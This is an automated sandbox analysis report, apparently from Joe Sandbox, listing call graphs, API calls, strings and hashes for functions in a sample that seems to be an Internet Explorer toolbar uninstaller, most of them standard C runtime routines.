__decode_pointer 6 API calls 3780->3781 3782 922c99 3781->3782 3783 9220f9 __decode_pointer 6 API calls 3782->3783 3784 922ca9 3783->3784 3793 922d2c 3784->3793 3800 92539a 3784->3800 3786 922d13 3787 92207e __encode_pointer 6 API calls 3786->3787 3788 922d21 3787->3788 3791 92207e __encode_pointer 6 API calls 3788->3791 3789 922cc7 3789->3786 3790 922ceb 3789->3790 3813 92377c 3789->3813 3790->3793 3794 92377c __realloc_crt 73 API calls 3790->3794 3795 922d01 3790->3795 3791->3793 3797 922da6 3793->3797 3794->3795 3795->3793 3796 92207e __encode_pointer 6 API calls 3795->3796 3796->3786 3863 921486 3797->3863 3801 9253a6 __mtinitlocknum 3800->3801 3802 9253d3 3801->3802 3803 9253b6 3801->3803 3804 925414 HeapSize 3802->3804 3806 922aa0 __lock 66 API calls 3802->3806 3805 922c72 __mtinitlocknum 66 API calls 3803->3805 3809 9253cb __mtinitlocknum 3804->3809 3807 9253bb 3805->3807 3810 9253e3 ___sbh_find_block 3806->3810 3808 922c0a _raise 6 API calls 3807->3808 3808->3809 3809->3789 3818 925434 3810->3818 3814 923785 3813->3814 3816 9237c4 3814->3816 3817 9237a5 Sleep 3814->3817 3822 92569d 3814->3822 3816->3790 3817->3814 3821 9229c6 LeaveCriticalSection 3818->3821 3820 92540f 3820->3804 3820->3809 3821->3820 3823 9256a9 __mtinitlocknum 3822->3823 3824 9256b0 3823->3824 3825 9256be 3823->3825 3826 9254b5 _malloc 66 API calls 3824->3826 3827 9256d1 3825->3827 3828 9256c5 3825->3828 3847 9256b8 _realloc __mtinitlocknum 3826->3847 3835 925843 3827->3835 3851 9256de ___sbh_resize_block ___sbh_find_block 3827->3851 3829 9235ee __mtinitlocknum 66 API calls 3828->3829 3829->3847 3830 925876 3831 9231eb _malloc 6 API calls 3830->3831 3834 92587c 3831->3834 3832 922aa0 __lock 66 API calls 3832->3851 3833 925848 HeapReAlloc 3833->3835 3833->3847 3836 922c72 __mtinitlocknum 66 API calls 3834->3836 3835->3830 3835->3833 3837 92589a 3835->3837 3838 9231eb _malloc 6 API calls 3835->3838 3840 925890 3835->3840 3836->3847 3839 922c72 __mtinitlocknum 66 API calls 3837->3839 3837->3847 3838->3835 3841 9258a3 GetLastError 3839->3841 3843 922c72 __mtinitlocknum 66 API calls 3840->3843 3841->3847 3857 925811 3843->3857 3844 925769 HeapAlloc 3844->3851 3845 9257be HeapReAlloc 3845->3851 3846 925816 GetLastError 3846->3847 3847->3814 3848 924dc3 ___sbh_alloc_block 5 API calls 3848->3851 3849 925829 3849->3847 3853 922c72 __mtinitlocknum 66 API calls 3849->3853 3850 9237f0 __VEC_memcpy _realloc 3850->3851 3851->3830 3851->3832 3851->3844 3851->3845 3851->3847 3851->3848 3851->3849 3851->3850 3852 9231eb _malloc 6 API calls 3851->3852 3855 92580c 3851->3855 3858 924614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3851->3858 3859 9257e1 3851->3859 3852->3851 3854 925836 3853->3854 3854->3841 3854->3847 3856 922c72 __mtinitlocknum 66 API calls 3855->3856 3856->3857 3857->3846 3857->3847 3858->3851 3862 9229c6 LeaveCriticalSection 3859->3862 3861 9257e8 3861->3851 3862->3861 3866 9229c6 LeaveCriticalSection 3863->3866 3865 92148d 3865->3776 3866->3865 3868 921561 __mtinitlocknum 3867->3868 3869 922aa0 __lock 66 API calls 3868->3869 3870 921568 3869->3870 3871 921631 __initterm 3870->3871 3873 921594 3870->3873 3886 92166c 3871->3886 3875 9220f9 __decode_pointer 6 API calls 3873->3875 3877 92159f 3875->3877 3876 921669 __mtinitlocknum 3876->3343 3879 921621 __initterm 3877->3879 3881 9220f9 __decode_pointer 6 API calls 3877->3881 3879->3871 3880 921660 3882 921465 __mtinitlocknum 3 API calls 3880->3882 3884 9215b4 3881->3884 3882->3876 3883 9220f0 6 API calls _raise 3883->3884 3884->3879 3884->3883 3885 9220f9 6 API calls __decode_pointer 3884->3885 3885->3884 3887 921672 3886->3887 3888 92164d 3886->3888 3891 9229c6 LeaveCriticalSection 3887->3891 3888->3876 3890 9229c6 LeaveCriticalSection 3888->3890 3890->3880 3891->3888 4436 9267c8 RtlUnwind 3994 92122e 3997 9218fe 3994->3997 3998 9222cc __getptd_noexit 66 API calls 3997->3998 3999 92123f 3998->3999 3958 92458d 3961 9229c6 LeaveCriticalSection 3958->3961 3960 924594 3961->3960

                                                                                  Executed Functions

                                                                                  Function 00921000 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 73libraryloadersynchronizationCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 00921006
                                                                                  • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00921013
                                                                                  • GetLastError.KERNEL32 ref: 0092101F
                                                                                  • GetCommandLineW.KERNEL32(?), ref: 00921040
                                                                                  • CommandLineToArgvW.SHELL32(00000000), ref: 00921047
                                                                                  • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00921061
                                                                                  • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00921073
                                                                                  • LoadLibraryW.KERNELBASE(?), ref: 00921085
                                                                                  • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00921097
                                                                                  • FreeLibrary.KERNELBASE(00000000), ref: 009210A4
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 009210AB
                                                                                  • CoUninitialize.COMBASE ref: 009210B1
                                                                                  • LocalFree.KERNEL32(00000000), ref: 009210BC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000030.00000002.3299896591.0000000000921000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00920000, based on PE: true
                                                                                  • Associated: 00000030.00000002.3299863073.0000000000920000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299939275.0000000000928000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299982938.000000000092A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3300022735.000000000092C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_48_2_920000_5phaM8.jbxd
                                                                                  Similarity
                                                                                  • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                                                  • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll$^t
                                                                                  • API String ID: 474438367-1096769585
                                                                                  • Opcode ID: 67e3c6870bafa1a2f24b6c293cf7c95102745c371f1de871242572905b6824dd
                                                                                  • Instruction ID: 61036bdef55791b961f99e707005b06c6ce8d9286a9fc14e16c2f7d8d181cb39
                                                                                  • Opcode Fuzzy Hash: 67e3c6870bafa1a2f24b6c293cf7c95102745c371f1de871242572905b6824dd
                                                                                  • Instruction Fuzzy Hash: 5B11B13269F275EB9330AB60BC08AAF379CAB65755B014525F542D2058CF218856E7F2
                                                                                  Function 00921465 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 16 921465-921476 call 92143a ExitProcess
                                                                                  APIs
                                                                                  • ___crtCorExitProcess.LIBCMT ref: 0092146D
                                                                                    • Part of subcall function 0092143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00921472,?,?,009254EE,000000FF,0000001E,?,009236FC,?,00000001,?,?,00922A2A,00000018), ref: 00921444
                                                                                    • Part of subcall function 0092143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00921454
                                                                                  • ExitProcess.KERNEL32 ref: 00921476
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000030.00000002.3299896591.0000000000921000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00920000, based on PE: true
                                                                                  • Associated: 00000030.00000002.3299863073.0000000000920000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299939275.0000000000928000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299982938.000000000092A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3300022735.000000000092C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_48_2_920000_5phaM8.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                  • String ID:
                                                                                  • API String ID: 2427264223-0
                                                                                  • Opcode ID: 356d05053c68290393fd7cf94b7c7396ed85caa131f374cc07a46ab5c602332d
                                                                                  • Instruction ID: b635d72ed2b92292a56d70991936c31e1d829d3f5ea206e5300aee6d85dcb1e8
                                                                                  • Opcode Fuzzy Hash: 356d05053c68290393fd7cf94b7c7396ed85caa131f374cc07a46ab5c602332d
                                                                                  • Instruction Fuzzy Hash: 2BB09B31044108BBDB113F11DC09D4D3F15FB803507608011F40C45031DF719D529590
                                                                                  Function 0092261B Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 19 92261b-92263d HeapCreate 20 922641-92264a 19->20 21 92263f-922640 19->21
                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00922630
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000030.00000002.3299896591.0000000000921000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00920000, based on PE: true
                                                                                  • Associated: 00000030.00000002.3299863073.0000000000920000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299939275.0000000000928000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299982938.000000000092A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3300022735.000000000092C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_48_2_920000_5phaM8.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 10892065-0
                                                                                  • Opcode ID: f038590bdf675889a6facfc47b20c0c2945b34b26e4c4aa44b27916de69dcbf4
                                                                                  • Instruction ID: 72eb26fd31f2e753a895113b52e52767fa7f734d02b054427b53417d194c7141
                                                                                  • Opcode Fuzzy Hash: f038590bdf675889a6facfc47b20c0c2945b34b26e4c4aa44b27916de69dcbf4
                                                                                  • Instruction Fuzzy Hash: 0ED0A7325A83456EDB206F717C487623BDCD384795F104436B90CC6160F670D596EA04
                                                                                  Function 00921681 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 22 921681-92168d call 921555 24 921692-921696 22->24
                                                                                  APIs
                                                                                  • _doexit.LIBCMT ref: 0092168D
                                                                                    • Part of subcall function 00921555: __lock.LIBCMT ref: 00921563
                                                                                    • Part of subcall function 00921555: __decode_pointer.LIBCMT ref: 0092159A
                                                                                    • Part of subcall function 00921555: __decode_pointer.LIBCMT ref: 009215AF
                                                                                    • Part of subcall function 00921555: __decode_pointer.LIBCMT ref: 009215D9
                                                                                    • Part of subcall function 00921555: __decode_pointer.LIBCMT ref: 009215EF
                                                                                    • Part of subcall function 00921555: __decode_pointer.LIBCMT ref: 009215FC
                                                                                    • Part of subcall function 00921555: __initterm.LIBCMT ref: 0092162B
                                                                                    • Part of subcall function 00921555: __initterm.LIBCMT ref: 0092163B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000030.00000002.3299896591.0000000000921000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00920000, based on PE: true
                                                                                  • Associated: 00000030.00000002.3299863073.0000000000920000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299939275.0000000000928000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299982938.000000000092A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3300022735.000000000092C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_48_2_920000_5phaM8.jbxd
                                                                                  Similarity
                                                                                  • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                  • String ID:
                                                                                  • API String ID: 1597249276-0
                                                                                  • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                  • Instruction ID: 1660ee9e0bc713c482dce6f58dd136e88c1d7de9bc5ba9056f219cac93ca4784
                                                                                  • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                  • Instruction Fuzzy Hash: 2AB0123258030C33DB202586FC03F063F0D87D0BA0F250060FA0C1D1F1AAA3B97180CA

                                                                                  Non-executed Functions

                                                                                  Function 009210CC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00921346
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0092135B
                                                                                  • UnhandledExceptionFilter.KERNEL32(0092816C), ref: 00921366
                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00921382
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00921389
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000030.00000002.3299896591.0000000000921000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00920000, based on PE: true
                                                                                  • Associated: 00000030.00000002.3299863073.0000000000920000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299939275.0000000000928000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299982938.000000000092A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3300022735.000000000092C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_48_2_920000_5phaM8.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 2579439406-0
                                                                                  • Opcode ID: 9dd5bf51ce66e231620d3cec254e6b3ad4e3282c9e34065299c07e67c716ae0f
                                                                                  • Instruction ID: c0072554939a4acdf0957f082128667e61011078743035b7c1fa3083dad9e4c1
                                                                                  • Opcode Fuzzy Hash: 9dd5bf51ce66e231620d3cec254e6b3ad4e3282c9e34065299c07e67c716ae0f
                                                                                  • Instruction Fuzzy Hash: 372103B6469304DFC730DF24FD446543BB0BB08312F40441AE50897AB1EBB8588BEF46
                                                                                  Function 009221E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00929458,0000000C,00922320,00000000,00000000,?,0092174F,00000003,?,?,?,?,?,?,009210F6), ref: 009221F7
                                                                                  • __crt_waiting_on_module_handle.LIBCMT ref: 00922202
                                                                                    • Part of subcall function 009213E1: Sleep.KERNEL32(000003E8,00000000,?,00922148,KERNEL32.DLL,?,00922194,?,0092174F,00000003), ref: 009213ED
                                                                                    • Part of subcall function 009213E1: GetModuleHandleW.KERNEL32(?,?,00922148,KERNEL32.DLL,?,00922194,?,0092174F,00000003,?,?,?,?,?,?,009210F6), ref: 009213F6
                                                                                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0092222B
                                                                                  • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0092223B
                                                                                  • __lock.LIBCMT ref: 0092225D
                                                                                  • InterlockedIncrement.KERNEL32(0092A4D8), ref: 0092226A
                                                                                  • __lock.LIBCMT ref: 0092227E
                                                                                  • ___addlocaleref.LIBCMT ref: 0092229C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000030.00000002.3299896591.0000000000921000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00920000, based on PE: true
                                                                                  • Associated: 00000030.00000002.3299863073.0000000000920000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299939275.0000000000928000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299982938.000000000092A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3300022735.000000000092C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_48_2_920000_5phaM8.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                  • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                  • API String ID: 1028249917-2843748187
                                                                                  • Opcode ID: f1a08c92c19036a1cd6b0d083b2e5a7b43fd353d4106c7cc4d19ac0b16566c52
                                                                                  • Instruction ID: 70a3ac7d674f6d7d36c34f1e308f2a702391b0966a4d3d6099534b7caedfbd7d
                                                                                  • Opcode Fuzzy Hash: f1a08c92c19036a1cd6b0d083b2e5a7b43fd353d4106c7cc4d19ac0b16566c52
                                                                                  • Instruction Fuzzy Hash: E411E171841720EFE730EF75F805B9BBBF4AF94310F20441AE4A9A76A4CB749A45DB24
                                                                                  Function 009240A0 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 170 9240a0-9240bb call 92264c call 922345 175 9240da-9240f2 call 922aa0 170->175 176 9240bd-9240c1 170->176 183 9240f4-9240f6 175->183 184 92412a-924136 call 92413b 175->184 176->175 178 9240c3 176->178 179 9240c6-9240c8 178->179 181 9240d2-9240d9 call 922691 179->181 182 9240ca-9240d1 call 921411 179->182 182->181 188 924112-924124 InterlockedIncrement 183->188 189 9240f8-924101 InterlockedDecrement 183->189 184->179 188->184 189->188 193 924103-924109 189->193 193->188 194 92410b-924111 call 9235ee 193->194 194->188
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 009240AC
                                                                                    • Part of subcall function 00922345: __getptd_noexit.LIBCMT ref: 00922348
                                                                                    • Part of subcall function 00922345: __amsg_exit.LIBCMT ref: 00922355
                                                                                  • __amsg_exit.LIBCMT ref: 009240CC
                                                                                  • __lock.LIBCMT ref: 009240DC
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 009240F9
                                                                                  • InterlockedIncrement.KERNEL32(02772C90), ref: 00924124
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000030.00000002.3299896591.0000000000921000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00920000, based on PE: true
                                                                                  • Associated: 00000030.00000002.3299863073.0000000000920000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299939275.0000000000928000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299982938.000000000092A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3300022735.000000000092C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_48_2_920000_5phaM8.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                  • String ID:
                                                                                  • API String ID: 4271482742-0
                                                                                  • Opcode ID: 315b048a8a7388ff66c3eb2a5b9ea6e41645ec3bac19001128f3eb5a68ed9e9f
                                                                                  • Instruction ID: 1d00dd965ef3841db45892006f46834cc8206b67c030e98bd0faa3d509cf3719
                                                                                  • Opcode Fuzzy Hash: 315b048a8a7388ff66c3eb2a5b9ea6e41645ec3bac19001128f3eb5a68ed9e9f
                                                                                  • Instruction Fuzzy Hash: DF01AD3294A631EBCB25AF25B8067597364BF54B10F044005E904A769ACB34A9A2EFD6
                                                                                  Function 009235EE Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 197 9235ee-9235ff call 92264c 200 923601-923608 197->200 201 923676-92367b call 922691 197->201 203 92360a-923622 call 922aa0 call 9245e4 200->203 204 92364d 200->204 214 923624-92362c call 924614 203->214 215 92362d-92363d call 923644 203->215 206 92364e-92365e HeapFree 204->206 206->201 209 923660-923675 call 922c72 GetLastError call 922c30 206->209 209->201 214->215 215->201 222 92363f-923642 215->222 222->206
                                                                                  APIs
                                                                                  • __lock.LIBCMT ref: 0092360C
                                                                                    • Part of subcall function 00922AA0: __mtinitlocknum.LIBCMT ref: 00922AB6
                                                                                    • Part of subcall function 00922AA0: __amsg_exit.LIBCMT ref: 00922AC2
                                                                                    • Part of subcall function 00922AA0: EnterCriticalSection.KERNEL32(?,?,?,00925600,00000004,00929628,0000000C,00923746,?,?,00000000,00000000,00000000,?,009222F7,00000001), ref: 00922ACA
                                                                                  • ___sbh_find_block.LIBCMT ref: 00923617
                                                                                  • ___sbh_free_block.LIBCMT ref: 00923626
                                                                                  • HeapFree.KERNEL32(00000000,?,00929568,0000000C,00922A81,00000000,009294C8,0000000C,00922ABB,?,?,?,00925600,00000004,00929628,0000000C), ref: 00923656
                                                                                  • GetLastError.KERNEL32(?,00925600,00000004,00929628,0000000C,00923746,?,?,00000000,00000000,00000000,?,009222F7,00000001,00000214), ref: 00923667
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000030.00000002.3299896591.0000000000921000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00920000, based on PE: true
                                                                                  • Associated: 00000030.00000002.3299863073.0000000000920000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299939275.0000000000928000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299982938.000000000092A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3300022735.000000000092C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_48_2_920000_5phaM8.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 2714421763-0
                                                                                  • Opcode ID: 5d8faabdee9b87495feb8ef405904f032a13964ac085e5df0ecc1ea916a45164
                                                                                  • Instruction ID: ac06c76bf0524cb254928d52631f2b2d2b401c01a1e0d52744d77fe6a5d11ab4
                                                                                  • Opcode Fuzzy Hash: 5d8faabdee9b87495feb8ef405904f032a13964ac085e5df0ecc1ea916a45164
                                                                                  • Instruction Fuzzy Hash: 6E01A231D09335BADB306B71BC07B4E36ACAF40720F608009F54066299CA388644DA58
                                                                                  Function 00923E04 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 223 923e04-923e1f call 92264c call 922345 228 923e43-923e6c call 922aa0 call 923dc6 call 923e6e 223->228 229 923e21-923e25 223->229 237 923e2f-923e31 228->237 229->228 230 923e27-923e2c call 922345 229->230 230->237 239 923e33-923e3a call 921411 237->239 240 923e3b-923e42 call 922691 237->240 239->240
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 00923E10
                                                                                    • Part of subcall function 00922345: __getptd_noexit.LIBCMT ref: 00922348
                                                                                    • Part of subcall function 00922345: __amsg_exit.LIBCMT ref: 00922355
                                                                                  • __getptd.LIBCMT ref: 00923E27
                                                                                  • __amsg_exit.LIBCMT ref: 00923E35
                                                                                  • __lock.LIBCMT ref: 00923E45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000030.00000002.3299896591.0000000000921000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00920000, based on PE: true
                                                                                  • Associated: 00000030.00000002.3299863073.0000000000920000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299939275.0000000000928000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3299982938.000000000092A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000030.00000002.3300022735.000000000092C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_48_2_920000_5phaM8.jbxd
                                                                                  Similarity
                                                                                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                  • String ID:
                                                                                  • API String ID: 3521780317-0
                                                                                  • Opcode ID: 5e0b9e6713498d2a916c25c71afb096c8a862a5d89314d4f86787f3edc8644a0
                                                                                  • Instruction ID: debcdbe30a0ddbaf4cc7cbd0c9fbac9040d4e13f23318079c155defa48dbd02e
                                                                                  • Opcode Fuzzy Hash: 5e0b9e6713498d2a916c25c71afb096c8a862a5d89314d4f86787f3edc8644a0
                                                                                  • Instruction Fuzzy Hash: D0F09A33A04330ABD720FB74B40774D72A0AF88B20F118549E445976EACB7C9A4ACB62

                                                                                  Non-executed Functions

                                                                                  Function 0109C2A8 Relevance: 5.4, Strings: 4, Instructions: 387COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000033.00000002.4523810523.0000000001052000.00000040.00000001.01000000.00000010.sdmp, Offset: 01000000, based on PE: true
                                                                                  • Associated: 00000033.00000002.4523637743.0000000001000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523670198.0000000001001000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523714781.0000000001014000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523947252.00000000010E4000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4524211762.0000000001268000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_51_2_1000000_kfbe6yYK.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: )$G$e$f
                                                                                  • API String ID: 0-2245162017
                                                                                  • Opcode ID: f7a44cec2744598267863f2589585a731415ed537d4f395a755e02706a2b46b7
                                                                                  • Instruction ID: eed74923653acd92866d3466b707db940005575f83759fcbc3270b22a4187788
                                                                                  • Opcode Fuzzy Hash: f7a44cec2744598267863f2589585a731415ed537d4f395a755e02706a2b46b7
                                                                                  • Instruction Fuzzy Hash: 3DC1A73141CB598BC71CEF28E8814BAB3E1FBD5315F549A2DD8CB87146DA38A9078B85
                                                                                  Function 010DD482 Relevance: .1, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000033.00000002.4523810523.0000000001052000.00000040.00000001.01000000.00000010.sdmp, Offset: 01000000, based on PE: true
                                                                                  • Associated: 00000033.00000002.4523637743.0000000001000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523670198.0000000001001000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523714781.0000000001014000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523947252.00000000010E4000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4524211762.0000000001268000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_51_2_1000000_kfbe6yYK.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bed0e4f323db74da4c76b2c67594192956caaaf5112b211647bb7abe91e204ea
                                                                                  • Instruction ID: a9d8479151fc38abe187e5af2279f8cb40a04f96502a1373001aa4ed0ccf4683
                                                                                  • Opcode Fuzzy Hash: bed0e4f323db74da4c76b2c67594192956caaaf5112b211647bb7abe91e204ea
                                                                                  • Instruction Fuzzy Hash: 0C21673151870D8F9718FF22F885496B3A6FBE4311F00CB3ED586C7526EF31502A8A95
                                                                                  Function 01003F00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 01003F37
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 01003F3F
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 01003FC8
